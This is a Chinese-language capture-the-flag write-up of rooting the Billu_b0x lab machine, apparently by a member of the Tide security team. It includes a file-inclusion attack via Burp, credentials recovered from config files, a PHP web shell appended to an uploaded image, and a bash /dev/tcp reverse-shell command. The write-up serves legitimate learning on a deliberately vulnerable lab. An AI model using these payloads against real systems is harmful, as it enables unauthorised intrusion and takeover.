一，前言

        上次做完中等难度的靶机 ，虽然没能独立完成但是感觉自己学到了很多知识。“雄关漫道真如铁，而今迈步从头越”，这次又找了个同样难度的靶机来做渗透测试，不管怎么说，每次拿下靶机之后心里还是有一些小小的成就感的。

二，靶机说明

         * 靶机难度：中级

         * 目        标：获取root权限

         * 运行环境：攻击机kali linux

                               靶机Billu_b0x 

                               均运行于VMware中

         * 网络设置：均为Nat连接模式

三，渗透实战过程

    1，端口扫描&目录爆破

           在虚拟机中启动kali和Billu_b0x，还是按照老套路在kali命令行里用nmap先找到靶机的IP地址，以便与其建立连接

           在这里靶机的IP为192.168.50.144，同时可以看到开启了22和80端口。先访问一波看看

           这是一个登录界面，现在我们没有用户名和密码也就无法登陆，而且根据我做的前面几套靶机的经验，在这种环境下暴力破解一般是不可取的。查看一下网页源代码看看有没有用户名和密码隐藏在里面

          也没有什么收获。接下来爆破web目录看看。先在命令行里爆破目录，再用dirbuster换别的字典爆破，这样可以得出更多的扫描结果

          输入命令  dirb "http://192.168.50.144/" /usr/share/dirb/wordlists/big.txt，在这里我用的是名为big的字典

    2，利用文件包含漏洞

          看来爆破目录对我们的帮助还是很大的，接下来访问一下这些页面，看看都是有什么内容

          add.php是一个图片上传网页，上传一张图片后打开uploaded_images发现并没有传上去。。换到别的页面看看

          打开test.php，网页提示file参数为空，需要提供file参数

          在地址栏里输入?file=/etc/passwd测试文件包含失败，会跳转到192.168.50.144的页面。

          接下来用burp抓包，将get请求转变为post请求尝试文件包含

         看样子这种方式是成功的，同时发现了一个1000的ID  ica，利用同样的方式查看add.php、in.php、c.php、index.php、show.php、panel.php等文件。

         查看c.php的时候发现了一个用户名及密码，打开刚开始时的首页登陆失败。打开扫描结果中的phpmy链接，登陆成功并再次发现了一个用户名和密码

         phpmyadmin的默认的配置文件是：config.inc.php，现在我们不知道路径，猜测路径在/var/www/phpmy下，

         看来猜测是对的，同时又发现了一个用户名root和密码roottoor，接下来再去登陆首页试试
         首先用ica_lab的数据库表中得到的用户名biLLu和密码hEx_it，登陆首页

         登陆成功后网页跳转到panel.php，这是一个账号管理页面，可以查看用户账号以及添加账户

         看到这里立刻就想到了利用图片上传漏洞，直接将php格式的一句话木马改为png图片格式上传

         网页显示上传失败。换一种思路，上传一张正常图片并在burp中抓包，在图片末尾加入<?php system($_GET['cmd']);?>

         接下来还是使用burp，在URL的post请求中加入POST /panel.php?cmd=cat%20/etc/passwd;ls，正文中加入load=/uploaded_images/apple233.png&continue=continue

         可以看到命令已经成功执行，接下来到了喜闻乐见的反弹shell步骤。

   3，shell反弹，root提权

          kali命令行里输入nc -lvnp 6666开始监听，同时burp的post请求中执行echo "bash -i >& /dev/tcp/192.168.50.140/6666 0>&1" | bash，注意要将此命令先经过URL编码才能发送

         shell反弹成功，我们还有个root用户一直没有派上用场，直接su - 

         又是提示需要终端，输入命令 python -c 'import pty;pty.spawn("/bin/bash")'

         再重试一下

         OK，进入到root目录，成功。

         看了网上的教程，其实不需要像我这样麻烦。因为靶机开启了ssh服务，在获取了root账户及其密码的时候直接用kali的ssh连接靶机就好了

         命令格式： ssh -p22 root@192.168.50.140

四，总结

        虽然都为中等难度，但是总体来说给我的感觉这个靶机相比较来说比上一个简单一些，前期主要是进行目录爆破就可以进行的很顺利。这个靶机的关键点在于利用文件包含进行代码审计，因为有两个关键的用户名和密码是利用这种方式得到的。当然也有踩到的坑，既然一开始已经用nmap发现靶机开启了22端口，在后面的时候就应该想到在攻击机里用ssh连接靶机，还是自己不够细心。

关于我们

Tide安全团队正式成立于2019年1月，是新潮信息旗下以互联网攻防技术研究为目标的安全团队，目前聚集了十多位专业的安全攻防技术研究人员，专注于网络攻防、Web安全、移动终端、安全开发、IoT/物联网/工控安全等方向。

想了解更多Tide安全团队，请关注团队官网: http://www.TideSec.net 或关注公众号：